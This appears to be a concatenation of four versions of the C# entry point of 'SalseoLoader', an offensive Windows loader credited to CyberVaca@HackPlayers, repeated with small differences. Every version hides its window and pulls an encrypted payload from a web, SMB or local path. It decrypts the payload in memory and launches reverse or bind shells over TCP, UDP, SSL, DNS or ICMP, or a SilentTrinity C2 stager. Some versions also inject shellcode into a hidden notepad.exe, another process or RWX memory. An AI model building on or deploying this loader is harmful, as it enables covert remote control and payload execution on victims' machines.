static void Main(string[] args) { IntPtr h = Process.GetCurrentProcess().MainWindowHandle; ShowWindow(h, 0); string banner = @" _____ ____ _ _____ ___ ___ / ___/ / || | / ___/ / _] / \ ( \_ | o || | ( \_ / [_ | | \__ || || |___\__ || _]| O | / \ || _ || / \ || [_ | | \ || | || \ || || | \___||__|__||_____|\___||_____| \___/ _ ___ ____ ___ ___ ____ | | / \ / || \ / _]| \ | | | || o || \ / [_ | D ) | |___ | O || || D || _]| / | || || _ || || [_ | \ | || || | || || || . \ |_____| \___/ |__|__||_____||_____||__|\_| "; Console.ForegroundColor = ConsoleColor.Green; Console.Write(banner); Console.ForegroundColor = ConsoleColor.White; Console.WriteLine(" By: CyberVaca@HackPlayers"); if (args.Length <= 3) { // Ayuda(); Console.ForegroundColor = ConsoleColor.Gray; Console.WriteLine("[+] Usage:\n"); Console.WriteLine(" [-] SalseoLoader.exe password http://webserver.com/elfuckingmal.txt ReverseTCP LHOST LPORT"); Console.WriteLine(" [-] SalseoLoader.exe password \\\\smbserver.com\\evil\\elfuckingmal.txt ReverseUDP LHOST LPORT"); Console.WriteLine(" [-] SalseoLoader.exe password c:\\temp\\elfuckingmal.txt ReverseICMP LHOST"); Console.WriteLine(" [-] SalseoLoader.exe password http://webserver.com/elfuckingmal.txt ReverseDNS LHOST ServerDNS"); Console.WriteLine(" [-] SalseoLoader.exe password http://webserver.com/elfuckingmal.txt BindTCP LHOST LPORT"); Console.WriteLine("\n[+] Shells availables:\n\n [-] ReverseTCP\n [-] ReverseUDP\n [-] ReverseDNS\n [-] ReverseICMP\n [-] BindTCP\n"); System.Environment.Exit(1); } //################### Parametros del Loader y comprobacion de los argumentos introducidos ################### string Salseo_Encriptado = null; string clave = args[0].ToString(); byte[] xKey = Encoding.ASCII.GetBytes(clave); string Salseo_URL = args[1].ToString(); string funcion = args[2].ToString().ToLower(); if (funcion == "reversetcp") { if (args.Length < 5) { Console.WriteLine("\n[-] Necesitas introducir un puerto :("); Environment.Exit(1); } } if (funcion == "reverseudp") { if (args.Length < 5) { Console.WriteLine("\n[-] Necesitas introducir un puerto :("); Environment.Exit(1); } } if (funcion == "reversedns") { if (args.Length < 5) { Console.WriteLine("\n[-] Necesitas introducir un nombre de dominio :("); Environment.Exit(1); } } if (funcion == "reverseicmp") { if (args.Length < 4) { Console.WriteLine("\n[-] Necesitas introducir un puerto :("); Environment.Exit(1); } } if (funcion != "reversetcp" & funcion != "reversedns" & funcion != "reverseicmp" & funcion != "reverseudp" & funcion != "bindtcp") { Console.WriteLine("\n[-] Error en el tipo de shell :("); Environment.Exit(1); } Console.ForegroundColor = ConsoleColor.Gray; if (args[1].ToString().Substring(0, 4).ToLower() == "http") { Salseo_Encriptado = ClienteWeb.LeePayload(args[1].ToString()); } if (args[1].ToString().Substring(0, 2).ToLower() == "\\\\") { Console.WriteLine("[+] Leyendo datos via SMB..."); if (System.IO.File.Exists(Salseo_URL) == false) { Console.WriteLine("[-] Error: No se pudo leer el payload ¿ La ruta es correcta ?"); Environment.Exit(1); } Salseo_Encriptado = LeeArchivoSMBorLocal.Archivo(args[1].ToString()); } if (args[1].ToString().Substring(0, 4).ToLower() != "http" && args[1].ToString().Substring(0, 2).ToLower() != "\\\\") { Console.WriteLine("[+] Leyendo datos via LOCAL..."); if (System.IO.File.Exists(Salseo_URL) == false) { Console.WriteLine("[-] Error: No se pudo leer el payload ¿ La ruta es correcta ?"); Environment.Exit(1); } Salseo_Encriptado = LeeArchivoSMBorLocal.Archivo(args[1].ToString()); } //############################################################# //####################### Cargando dll ######################## //############################################################# string hexadecimal = Zipea.Descomprime(Salseo_Encriptado); byte[] Final_Payload_encriptado = StringHEXToByteArray.Convierte(hexadecimal); byte[] Final_Payload = RC4.Decrypt(xKey, Final_Payload_encriptado); string clases = null; Console.WriteLine("[+] Desencriptando el salseo."); Assembly salsongo = Assembly.Load(Final_Payload); Console.WriteLine("[+] Cargando la salsa en memoria."); Console.WriteLine("[+] Namespace de Assembly : " + salsongo.GetName().Name); foreach (Type infoass in salsongo.GetTypes()) { var strclase = string.Format("{0}", infoass.Name); clases = strclase; } ; //Console.WriteLine("[+] Class de Assembly : " + clases); //######################## Foreach de los metodos #################### //##################################################################### Console.WriteLine("[+] Version: " + salsongo.GetName().Version.ToString()); Console.ForegroundColor = ConsoleColor.White; //############################################################# //########################### LLamada a funcion Reversa ######################## if (funcion == "reversetcp") { string LHOST = args[3].ToString(); string LPORT = args[4].ToString(); string[] argumentos = new string[] { LHOST + " " + LPORT }; Type myType = salsongo.GetTypes()[0]; MethodInfo Method = myType.GetMethod("reversetcp"); object myInstance = Activator.CreateInstance(myType); Method.Invoke(myInstance, new object[] { argumentos }); } if (funcion == "reverseudp") { string LHOST = args[3].ToString(); string LPORT = args[4].ToString(); string[] argumentos = new string[] { LHOST + " " + LPORT }; Type myType = salsongo.GetTypes()[0]; MethodInfo Method = myType.GetMethod("reverseudp"); object myInstance = Activator.CreateInstance(myType); Method.Invoke(myInstance, new object[] { argumentos }); } if (funcion == "reversedns") { string LHOST = args[3].ToString(); string DNSServer = args[4].ToString(); string[] argumentos = new string[] { LHOST + " " + DNSServer }; Type myType = salsongo.GetTypes()[0]; MethodInfo Method = myType.GetMethod("reversedns"); object myInstance = Activator.CreateInstance(myType); Method.Invoke(myInstance, new object[] { argumentos }); } if (funcion == "reverseicmp") { string LHOST = args[3].ToString(); string[] argumentos = new string[] { LHOST + " " }; Type myType = salsongo.GetTypes()[0]; MethodInfo Method = myType.GetMethod("reverseicmp"); object myInstance = Activator.CreateInstance(myType); Method.Invoke(myInstance, new object[] { argumentos }); } if (funcion == "bindtcp") { string LHOST = args[3].ToString(); string LPORT = args[4].ToString(); string[] argumentos = new string[] { LHOST + " " + LPORT }; Type myType = salsongo.GetTypes()[0]; MethodInfo Method = myType.GetMethod("bindtcp"); object myInstance = Activator.CreateInstance(myType); Method.Invoke(myInstance, new object[] { argumentos }); } }
static void Main(string[] args) { IntPtr h = Process.GetCurrentProcess().MainWindowHandle; ShowWindow(h, 0); string banner = @" _____ ____ _ _____ ___ ___ / ___/ / || | / ___/ / _] / \ ( \_ | o || | ( \_ / [_ | | \__ || || |___\__ || _]| O | / \ || _ || / \ || [_ | | \ || | || \ || || | \___||__|__||_____|\___||_____| \___/ _ ___ ____ ___ ___ ____ | | / \ / || \ / _]| \ | | | || o || \ / [_ | D ) | |___ | O || || D || _]| / | || || _ || || [_ | \ | || || | || || || . \ |_____| \___/ |__|__||_____||_____||__|\_| 2.0 "; Console.ForegroundColor = ConsoleColor.Green; Console.Write(banner); Console.ForegroundColor = ConsoleColor.White; Console.WriteLine(" By: CyberVaca@HackPlayers"); if (args.Length <= 2) { string ayuda = @" [+] Usage: [-] SalseoLoader.exe password http://webserver.com/elfuckingmal.txt ReverseTCP LHOST LPORT [-] SalseoLoader.exe password \\smbserver.com\evil\elfuckingmal.txt ReverseUDP LHOST LPORT [-] SalseoLoader.exe password c:\temp\elfuckingmal.txt ReverseICMP LHOST [-] SalseoLoader.exe password http://webserver.com/elfuckingmal.txt ReverseDNS LHOST ServerDNS [-] SalseoLoader.exe password http://webserver.com/elfuckingmal.txt BindTCP LHOST LPORT [-] SalseoLoader.exe password c:\temp\elfuckingmal.txt ReverseSSL LHOST LPORT [-] SalseoLoader.exe password http://webserver.com/shellcode.txt shellcode [-] SalseoLoader.exe password http://webserver.com/shellcode.txt shellcode PID [-] SalseoLoader.exe password http://webserver.com/silent.txt silenttrinity URL_C2C [+] Available Payloads: [-] ReverseTCP [-] ReverseDNS [-] ReverseSSL [-] Shellcode [-] ReverseUDP [-] ReverseICMP [-] BindTCP [-] SilentTrinity "; // Ayuda(); Console.ForegroundColor = ConsoleColor.Gray; Console.WriteLine(ayuda); System.Environment.Exit(1); } //################### Parametros del Loader y comprobacion de los argumentos introducidos ################### string Salseo_Encriptado = null; string clave = args[0].ToString(); byte[] xKey = Encoding.ASCII.GetBytes(clave); string Salseo_URL = args[1].ToString(); string funcion = args[2].ToString().ToLower(); if (funcion == "reversetcp" || funcion == "reversessl") { if (args.Length < 5) { Console.WriteLine("\n[-] Necesitas introducir un puerto :("); Environment.Exit(1); } } if (funcion == "reverseudp") { if (args.Length < 5) { Console.WriteLine("\n[-] Necesitas introducir un puerto :("); Environment.Exit(1); } } if (funcion == "reversedns") { if (args.Length < 5) { Console.WriteLine("\n[-] Necesitas introducir un nombre de dominio :("); Environment.Exit(1); } } if (funcion == "reverseicmp") { if (args.Length < 4) { Environment.Exit(1); } } if (funcion == "shellcode") { if (args.Length < 2) { Environment.Exit(1); } } if (funcion != "reversetcp" & funcion != "reversedns" & funcion != "reverseicmp" & funcion != "reverseudp" & funcion != "bindtcp" & funcion != "reversessl" & funcion != "shellcode" & funcion != "silenttrinity") { Console.WriteLine("\n[-] Error en el tipo de shell :("); Environment.Exit(1); } if (funcion == "silenttrinity") { if (args.Length < 3) { Environment.Exit(1); } } Console.ForegroundColor = ConsoleColor.Gray; if (args[1].ToString().Substring(0, 4).ToLower() == "http") { Salseo_Encriptado = ClienteWeb.LeePayload(args[1].ToString()); } if (args[1].ToString().Substring(0, 2).ToLower() == "\\\\") { Console.WriteLine("[+] Leyendo datos via SMB..."); if (System.IO.File.Exists(Salseo_URL) == false) { Console.WriteLine("[-] Error: No se pudo leer el payload ¿ La ruta es correcta ?"); Environment.Exit(1); } Salseo_Encriptado = LeeArchivoSMBorLocal.Archivo(args[1].ToString()); } if (args[1].ToString().Substring(0, 4).ToLower() != "http" && args[1].ToString().Substring(0, 2).ToLower() != "\\\\") { Console.WriteLine("[+] Leyendo datos via LOCAL..."); if (System.IO.File.Exists(Salseo_URL) == false) { Console.WriteLine("[-] Error: No se pudo leer el payload ¿ La ruta es correcta ?"); Environment.Exit(1); } Salseo_Encriptado = LeeArchivoSMBorLocal.Archivo(args[1].ToString()); } //############################################################# //####################### Cargando dll ######################## //############################################################# string hexadecimal = Zipea.Descomprime(Salseo_Encriptado); byte[] Final_Payload_encriptado = StringHEXToByteArray.Convierte(hexadecimal); byte[] Final_Payload = RC4.Decrypt(xKey, Final_Payload_encriptado); string clases = null; Assembly salsongo = null; if (funcion != "shellcode") { salsongo = Assembly.Load(Final_Payload); Console.WriteLine("[+] Cargando la salsa en memoria."); Console.WriteLine("[+] Namespace de Assembly : " + salsongo.GetName().Name); foreach (Type infoass in salsongo.GetTypes()) { var strclase = string.Format("{0}", infoass.Name); clases = strclase; } ; //######################## Foreach de los metodos #################### //##################################################################### //Console.WriteLine("[+] Version: " + salsongo.GetName().Version.ToString()); //Console.ForegroundColor = ConsoleColor.White; //############################################################# } //########################### LLamada a funcion SilentTrinity ######################## if (funcion == "silenttrinity") { string URLSILENT = args[3].ToString(); string[] argumentos = new string[] { URLSILENT }; Type myType = salsongo.GetTypes()[0]; MethodInfo Method = myType.GetMethod("lanza"); object myInstance = Activator.CreateInstance(myType); Method.Invoke(myInstance, new object[] { argumentos }); } //########################### LLamada a funcion Reversa ######################## if (funcion == "reversetcp") { string LHOST = args[3].ToString(); string LPORT = args[4].ToString(); string[] argumentos = new string[] { LHOST + " " + LPORT }; Type myType = salsongo.GetTypes()[0]; MethodInfo Method = myType.GetMethod("reversetcp"); object myInstance = Activator.CreateInstance(myType); Method.Invoke(myInstance, new object[] { argumentos }); } if (funcion == "reversessl") { string LHOST = args[3].ToString(); string LPORT = args[4].ToString(); string[] argumentos = new string[] { LHOST + " " + LPORT }; Type myType = salsongo.GetTypes()[0]; MethodInfo Method = myType.GetMethod("reversessl"); object myInstance = Activator.CreateInstance(myType); Method.Invoke(myInstance, new object[] { argumentos }); } if (funcion == "reverseudp") { string LHOST = args[3].ToString(); string LPORT = args[4].ToString(); string[] argumentos = new string[] { LHOST + " " + LPORT }; Type myType = salsongo.GetTypes()[0]; MethodInfo Method = myType.GetMethod("reverseudp"); object myInstance = Activator.CreateInstance(myType); Method.Invoke(myInstance, new object[] { argumentos }); } if (funcion == "reversedns") { string LHOST = args[3].ToString(); string DNSServer = args[4].ToString(); string[] argumentos = new string[] { LHOST + " " + DNSServer }; Type myType = salsongo.GetTypes()[0]; MethodInfo Method = myType.GetMethod("reversedns"); object myInstance = Activator.CreateInstance(myType); Method.Invoke(myInstance, new object[] { argumentos }); } if (funcion == "reverseicmp") { string LHOST = args[3].ToString(); string[] argumentos = new string[] { LHOST + " " }; Type myType = salsongo.GetTypes()[0]; MethodInfo Method = myType.GetMethod("reverseicmp"); object myInstance = Activator.CreateInstance(myType); Method.Invoke(myInstance, new object[] { argumentos }); } if (funcion == "bindtcp") { string LHOST = args[3].ToString(); string LPORT = args[4].ToString(); string[] argumentos = new string[] { LHOST + " " + LPORT }; Type myType = salsongo.GetTypes()[0]; MethodInfo Method = myType.GetMethod("bindtcp"); object myInstance = Activator.CreateInstance(myType); Method.Invoke(myInstance, new object[] { argumentos }); } if (funcion == "shellcode") { byte[] sc = Final_Payload; if (args.Length == 4) { int pid = System.Convert.ToInt32(args[3].ToString()); SalsaInjector.CodeInject(pid, sc); } if (args.Length == 3) { Process proc = new Process(); Console.WriteLine("[+] Spawneando proceso notepad.exe"); proc.StartInfo.FileName = "C:\\WINDOWS\\SYSTEM32\\NOTEPAD.EXE"; proc.StartInfo.WindowStyle = ProcessWindowStyle.Hidden; proc.Start(); int pid = proc.Id; Console.WriteLine("[+] Proceso con pid " + pid); SalsaInjector.CodeInject(pid, sc); } } }
static void Main(string[] args) { IntPtr h = Process.GetCurrentProcess().MainWindowHandle; ShowWindow(h, 0); string banner = @" _____ ____ _ _____ ___ ___ / ___/ / || | / ___/ / _] / \ ( \_ | o || | ( \_ / [_ | | \__ || || |___\__ || _]| O | / \ || _ || / \ || [_ | | \ || | || \ || || | \___||__|__||_____|\___||_____| \___/ _ ___ ____ ___ ___ ____ | | / \ / || \ / _]| \ | | | || o || \ / [_ | D ) | |___ | O || || D || _]| / | || || _ || || [_ | \ | || || | || || || . \ |_____| \___/ |__|__||_____||_____||__|\_| "; Console.ForegroundColor = ConsoleColor.Green; Console.Write(banner); Console.ForegroundColor = ConsoleColor.White; Console.WriteLine(" By: CyberVaca@HackPlayers"); if (args.Length <= 2) { string ayuda = @" [+] Usage: [-] SalseoLoader.exe password http://webserver.com/elfuckingmal.txt ReverseTCP LHOST LPORT [-] SalseoLoader.exe password \\smbserver.com\evil\elfuckingmal.txt ReverseUDP LHOST LPORT [-] SalseoLoader.exe password c:\temp\elfuckingmal.txt ReverseICMP LHOST [-] SalseoLoader.exe password http://webserver.com/elfuckingmal.txt ReverseDNS LHOST ServerDNS [-] SalseoLoader.exe password http://webserver.com/elfuckingmal.txt BindTCP LHOST LPORT [-] SalseoLoader.exe password c:\temp\elfuckingmal.txt ReverseSSL LHOST LPORT [-] SalseoLoader.exe password http://webserver.com/shellcode.txt shellcode [-] SalseoLoader.exe password http://webserver.com/silent.txt silenttrinity URL_C2C [+] Available Payloads: [-] ReverseTCP [-] ReverseDNS [-] ReverseSSL [-] Shellcode [-] ReverseUDP [-] ReverseICMP [-] BindTCP [-] SilentTrinity "; // Ayuda(); Console.ForegroundColor = ConsoleColor.Gray; Console.WriteLine(ayuda); System.Environment.Exit(1); } //################### Parametros del Loader y comprobacion de los argumentos introducidos ################### string Salseo_Encriptado = null; string clave = args[0].ToString(); byte[] xKey = Encoding.ASCII.GetBytes(clave); string Salseo_URL = args[1].ToString(); string funcion = args[2].ToString().ToLower(); if (funcion == "reversetcp" || funcion == "reversessl") { if (args.Length < 5) { Console.WriteLine("\n[-] Necesitas introducir un puerto :("); Environment.Exit(1); } } if (funcion == "reverseudp") { if (args.Length < 5) { Console.WriteLine("\n[-] Necesitas introducir un puerto :("); Environment.Exit(1); } } if (funcion == "reversedns") { if (args.Length < 5) { Console.WriteLine("\n[-] Necesitas introducir un nombre de dominio :("); Environment.Exit(1); } } if (funcion == "reverseicmp") { if (args.Length < 4) { Environment.Exit(1); } } if (funcion == "shellcode") { if (args.Length < 2) { Environment.Exit(1); } } if (funcion != "reversetcp" & funcion != "reversedns" & funcion != "reverseicmp" & funcion != "reverseudp" & funcion != "bindtcp" & funcion != "reversessl" & funcion != "shellcode" & funcion != "silenttrinity") { Console.WriteLine("\n[-] Error en el tipo de shell :("); Environment.Exit(1); } if (funcion == "silenttrinity") { if (args.Length < 3) { Environment.Exit(1); } } Console.ForegroundColor = ConsoleColor.Gray; if (args[1].ToString().Substring(0, 4).ToLower() == "http") { Salseo_Encriptado = ClienteWeb.LeePayload(args[1].ToString()); } if (args[1].ToString().Substring(0, 2).ToLower() == "\\\\") { Console.WriteLine("[+] Leyendo datos via SMB..."); if (System.IO.File.Exists(Salseo_URL) == false) { Console.WriteLine("[-] Error: No se pudo leer el payload ¿ La ruta es correcta ?"); Environment.Exit(1); } Salseo_Encriptado = LeeArchivoSMBorLocal.Archivo(args[1].ToString()); } if (args[1].ToString().Substring(0, 4).ToLower() != "http" && args[1].ToString().Substring(0, 2).ToLower() != "\\\\") { Console.WriteLine("[+] Leyendo datos via LOCAL..."); if (System.IO.File.Exists(Salseo_URL) == false) { Console.WriteLine("[-] Error: No se pudo leer el payload ¿ La ruta es correcta ?"); Environment.Exit(1); } Salseo_Encriptado = LeeArchivoSMBorLocal.Archivo(args[1].ToString()); } //############################################################# //####################### Cargando dll ######################## //############################################################# string hexadecimal = Zipea.Descomprime(Salseo_Encriptado); byte[] Final_Payload_encriptado = StringHEXToByteArray.Convierte(hexadecimal); byte[] Final_Payload = RC4.Decrypt(xKey, Final_Payload_encriptado); string clases = null; Assembly salsongo = null; if (funcion != "shellcode") { salsongo = Assembly.Load(Final_Payload); Console.WriteLine("[+] Cargando la salsa en memoria."); Console.WriteLine("[+] Namespace de Assembly : " + salsongo.GetName().Name); foreach (Type infoass in salsongo.GetTypes()) { var strclase = string.Format("{0}", infoass.Name); clases = strclase; } ; //######################## Foreach de los metodos #################### //##################################################################### //Console.WriteLine("[+] Version: " + salsongo.GetName().Version.ToString()); //Console.ForegroundColor = ConsoleColor.White; //############################################################# } //########################### LLamada a funcion SilentTrinity ######################## if (funcion == "silenttrinity") { string URLSILENT = args[3].ToString(); string[] argumentos = new string[] { URLSILENT + " " }; Type myType = salsongo.GetTypes()[0]; MethodInfo Method = myType.GetMethod("lanza"); object myInstance = Activator.CreateInstance(myType); Method.Invoke(myInstance, new object[] { argumentos }); } //########################### LLamada a funcion Reversa ######################## if (funcion == "reversetcp") { string LHOST = args[3].ToString(); string LPORT = args[4].ToString(); string[] argumentos = new string[] { LHOST + " " + LPORT }; Type myType = salsongo.GetTypes()[0]; MethodInfo Method = myType.GetMethod("reversetcp"); object myInstance = Activator.CreateInstance(myType); Method.Invoke(myInstance, new object[] { argumentos }); } if (funcion == "reversessl") { string LHOST = args[3].ToString(); string LPORT = args[4].ToString(); string[] argumentos = new string[] { LHOST + " " + LPORT }; Type myType = salsongo.GetTypes()[0]; MethodInfo Method = myType.GetMethod("reversessl"); object myInstance = Activator.CreateInstance(myType); Method.Invoke(myInstance, new object[] { argumentos }); } if (funcion == "reverseudp") { string LHOST = args[3].ToString(); string LPORT = args[4].ToString(); string[] argumentos = new string[] { LHOST + " " + LPORT }; Type myType = salsongo.GetTypes()[0]; MethodInfo Method = myType.GetMethod("reverseudp"); object myInstance = Activator.CreateInstance(myType); Method.Invoke(myInstance, new object[] { argumentos }); } if (funcion == "reversedns") { string LHOST = args[3].ToString(); string DNSServer = args[4].ToString(); string[] argumentos = new string[] { LHOST + " " + DNSServer }; Type myType = salsongo.GetTypes()[0]; MethodInfo Method = myType.GetMethod("reversedns"); object myInstance = Activator.CreateInstance(myType); Method.Invoke(myInstance, new object[] { argumentos }); } if (funcion == "reverseicmp") { string LHOST = args[3].ToString(); string[] argumentos = new string[] { LHOST + " " }; Type myType = salsongo.GetTypes()[0]; MethodInfo Method = myType.GetMethod("reverseicmp"); object myInstance = Activator.CreateInstance(myType); Method.Invoke(myInstance, new object[] { argumentos }); } if (funcion == "bindtcp") { string LHOST = args[3].ToString(); string LPORT = args[4].ToString(); string[] argumentos = new string[] { LHOST + " " + LPORT }; Type myType = salsongo.GetTypes()[0]; MethodInfo Method = myType.GetMethod("bindtcp"); object myInstance = Activator.CreateInstance(myType); Method.Invoke(myInstance, new object[] { argumentos }); } if (funcion == "shellcode") { byte[] sc = Final_Payload; IntPtr baseAddr = VirtualAlloc(IntPtr.Zero, (UIntPtr)(sc.Length + 1), AllocationType.RESERVE | AllocationType.COMMIT, MemoryProtection.EXECUTE_READWRITE); System.Diagnostics.Debug.Assert(baseAddr != IntPtr.Zero, "Error: No se pudo asignar la memoria remota."); Console.WriteLine("[+] Intentando cargar Shellcode"); try { Marshal.Copy(sc, 0, baseAddr, sc.Length); ExecuteDelegate del = (ExecuteDelegate)Marshal.GetDelegateForFunctionPointer(baseAddr, typeof(ExecuteDelegate)); del(); } catch (Exception e) { Console.WriteLine(e.Message); } finally { VirtualFree(baseAddr, 0, FreeType.MEM_RELEASE); } } }
static void Main(string[] args) { IntPtr h = Process.GetCurrentProcess().MainWindowHandle; ShowWindow(h, 0); string banner = @" _____ ____ _ _____ ___ ___ / ___/ / || | / ___/ / _] / \ ( \_ | o || | ( \_ / [_ | | \__ || || |___\__ || _]| O | / \ || _ || / \ || [_ | | \ || | || \ || || | \___||__|__||_____|\___||_____| \___/ _ ___ ____ ___ ___ ____ | | / \ / || \ / _]| \ | | | || o || \ / [_ | D ) | |___ | O || || D || _]| / | || || _ || || [_ | \ | || || | || || || . \ |_____| \___/ |__|__||_____||_____||__|\_| "; Console.ForegroundColor = ConsoleColor.Green; Console.Write(banner); Console.ForegroundColor = ConsoleColor.White; Console.WriteLine(" By: CyberVaca@HackPlayers"); string ayuda = @" [+] Usage: [-] SalseoStandalone.exe [-] You need to have your mandanga.txt on the same folder! [-] Serve your payload as you want! SMB, HTTP, Locally... [-] Want a meterpreter shell? Create a raw payload with msfvenom, encrypt it with encrypterassembly.py and use shellcode function. [-] Mandanga.txt contents: [-] Reverse TCP/UDP/SSL [-] Reverse ICMP [-] Reverse DNS <password> <password> <password> <path_to_elmal.txt> <path_to_elmal.txt> <path_to_elmal.txt> reversetcp/udp/ssl reverseicmp reversedns <LHOST> <LHOST> <LHOST> <LPORT> <DNS Server> [-] Bind TCP [-] SilentTrinity [-] Shellcode <password> <password> <password> <path_to_elmal.txt> <path_to_elmal.txt> <path_to_payload.txt> bindtcp silenttrinity shellcode <LHOST> <URL_to_C2C> <LPORT> [+] Available Payloads: [-] ReverseTCP [-] ReverseDNS [-] ReverseSSL [-] Shellcode [-] ReverseUDP [-] ReverseICMP [-] BindTCP [-] SilentTrinity "; //################### Parametros del Loader y comprobacion de los argumentos introducidos ################### //////////////////////STANDALONE VERSION string file_name = ".\\mandanga.txt"; string clave = ""; string Salseo_URL = ""; string funcion = ""; string DNSServer = ""; string URLSILENT = ""; string LHOST = ""; string LPORT = ""; if (System.IO.File.Exists(file_name) == true) { System.IO.StreamReader objReader; try { if (File.ReadLines(file_name).Count() < 3) { Console.WriteLine(ayuda); Environment.Exit(1); } objReader = new System.IO.StreamReader(file_name); clave = objReader.ReadLine(); //Pass. ALways present. Salseo_URL = objReader.ReadLine(); //elmal.txt or shellcode.txt. Always present. funcion = objReader.ReadLine().ToLower(); //Chosen function. Always present. Console.WriteLine("[+] Password: "******"shellcode") { Console.WriteLine("[+] Shellcode path: " + Salseo_URL); } else { Console.WriteLine("[+] Elmal.txt path: " + Salseo_URL); } Console.WriteLine("[+] Chosen Function: " + funcion); if (funcion == "shellcode") { } else if (funcion == "silenttrinity") { if (File.ReadLines(file_name).Count() < 4) { Console.WriteLine(ayuda); Environment.Exit(1); } URLSILENT = objReader.ReadLine(); //SilentTrinity URL. Console.WriteLine("[+] SilentTrinity URL: " + URLSILENT); } else if (funcion == "icmp") { if (File.ReadLines(file_name).Count() < 4) { Console.WriteLine(ayuda); Environment.Exit(1); } LHOST = objReader.ReadLine(); //SilentTrinity URL. Console.WriteLine("[+] SilentTrinity URL: " + LHOST); } else if (funcion == "serverdns") { //HOST + DNSserver for dns shells. if (File.ReadLines(file_name).Count() < 5) { Console.WriteLine(ayuda); Environment.Exit(1); } LHOST = objReader.ReadLine(); DNSServer = objReader.ReadLine(); Console.WriteLine("IP: " + LHOST); Console.WriteLine("Port: " + DNSServer); } else { //HOST + PORT for bind/reverse shells. if (File.ReadLines(file_name).Count() < 5) { Console.WriteLine(ayuda); Environment.Exit(1); } LHOST = objReader.ReadLine(); LPORT = objReader.ReadLine(); Console.WriteLine("IP: " + LHOST); Console.WriteLine("Port: " + LPORT); } objReader.Close(); } catch (System.NullReferenceException e) { Console.WriteLine(e); } } else { Console.WriteLine(ayuda); Console.WriteLine("[-] .\\mandanga.txt file does not exist."); Environment.Exit(1); } string Salseo_Encriptado = null; byte[] xKey = Encoding.ASCII.GetBytes(clave); Console.ForegroundColor = ConsoleColor.Gray; if (Salseo_URL.Substring(0, 4).ToLower() == "http") { Salseo_Encriptado = ClienteWeb.LeePayload(Salseo_URL); } if (Salseo_URL.Substring(0, 2).ToLower() == "\\\\") { Console.WriteLine("[+] Leyendo datos via SMB..."); if (System.IO.File.Exists(Salseo_URL) == false) { Console.WriteLine("[-] Error: No se pudo leer el payload ¿ La ruta es correcta ?"); Environment.Exit(1); } Salseo_Encriptado = LeeArchivoSMBorLocal.Archivo(Salseo_URL); } if (Salseo_URL.Substring(0, 4).ToLower() != "http" && Salseo_URL.Substring(0, 2).ToLower() != "\\\\") { Console.WriteLine("[+] Leyendo datos via LOCAL..."); if (System.IO.File.Exists(Salseo_URL) == false) { Console.WriteLine("[-] Error: No se pudo leer el payload ¿ La ruta es correcta ?"); Environment.Exit(1); } Salseo_Encriptado = LeeArchivoSMBorLocal.Archivo(Salseo_URL); } //############################################################# //####################### Cargando dll ######################## //############################################################# string hexadecimal = Zipea.Descomprime(Salseo_Encriptado); byte[] Final_Payload_encriptado = StringHEXToByteArray.Convierte(hexadecimal); byte[] Final_Payload = RC4.Decrypt(xKey, Final_Payload_encriptado); string clases = null; Assembly salsongo = null; if (funcion != "shellcode") { salsongo = Assembly.Load(Final_Payload); Console.WriteLine("[+] Cargando la salsa en memoria."); Console.WriteLine("[+] Namespace de Assembly : " + salsongo.GetName().Name); foreach (Type infoass in salsongo.GetTypes()) { var strclase = string.Format("{0}", infoass.Name); clases = strclase; } ; } //########################### LLamada a funcion SilentTrinity ######################## if (funcion == "silenttrinity") { string[] argumentos = new string[] { URLSILENT }; Type myType = salsongo.GetTypes()[0]; MethodInfo Method = myType.GetMethod("lanza"); object myInstance = Activator.CreateInstance(myType); Method.Invoke(myInstance, new object[] { argumentos }); } //########################### LLamada a funcion Reversa ######################## if (funcion == "reversetcp") { string[] argumentos = new string[] { LHOST + " " + LPORT }; Type myType = salsongo.GetTypes()[0]; MethodInfo Method = myType.GetMethod("reversetcp"); object myInstance = Activator.CreateInstance(myType); Method.Invoke(myInstance, new object[] { argumentos }); } if (funcion == "reversessl") { string[] argumentos = new string[] { LHOST + " " + LPORT }; Type myType = salsongo.GetTypes()[0]; MethodInfo Method = myType.GetMethod("reversessl"); object myInstance = Activator.CreateInstance(myType); Method.Invoke(myInstance, new object[] { argumentos }); } if (funcion == "reverseudp") { string[] argumentos = new string[] { LHOST + " " + LPORT }; Type myType = salsongo.GetTypes()[0]; MethodInfo Method = myType.GetMethod("reverseudp"); object myInstance = Activator.CreateInstance(myType); Method.Invoke(myInstance, new object[] { argumentos }); } if (funcion == "reversedns") { string[] argumentos = new string[] { LHOST + " " + DNSServer }; Type myType = salsongo.GetTypes()[0]; MethodInfo Method = myType.GetMethod("reversedns"); object myInstance = Activator.CreateInstance(myType); Method.Invoke(myInstance, new object[] { argumentos }); } if (funcion == "reverseicmp") { string[] argumentos = new string[] { LHOST + " " }; Type myType = salsongo.GetTypes()[0]; MethodInfo Method = myType.GetMethod("reverseicmp"); object myInstance = Activator.CreateInstance(myType); Method.Invoke(myInstance, new object[] { argumentos }); } if (funcion == "bindtcp") { string[] argumentos = new string[] { LHOST + " " + LPORT }; Type myType = salsongo.GetTypes()[0]; MethodInfo Method = myType.GetMethod("bindtcp"); object myInstance = Activator.CreateInstance(myType); Method.Invoke(myInstance, new object[] { argumentos }); } if (funcion == "shellcode") { byte[] sc = Final_Payload; IntPtr baseAddr = VirtualAlloc(IntPtr.Zero, (UIntPtr)(sc.Length + 1), AllocationType.RESERVE | AllocationType.COMMIT, MemoryProtection.EXECUTE_READWRITE); System.Diagnostics.Debug.Assert(baseAddr != IntPtr.Zero, "Error: No se pudo asignar la memoria remota."); Console.WriteLine("[+] Intentando cargar Shellcode"); try { Marshal.Copy(sc, 0, baseAddr, sc.Length); ExecuteDelegate del = (ExecuteDelegate)Marshal.GetDelegateForFunctionPointer(baseAddr, typeof(ExecuteDelegate)); del(); } catch (Exception e) { Console.WriteLine(e.Message); } finally { VirtualFree(baseAddr, 0, FreeType.MEM_RELEASE); } } }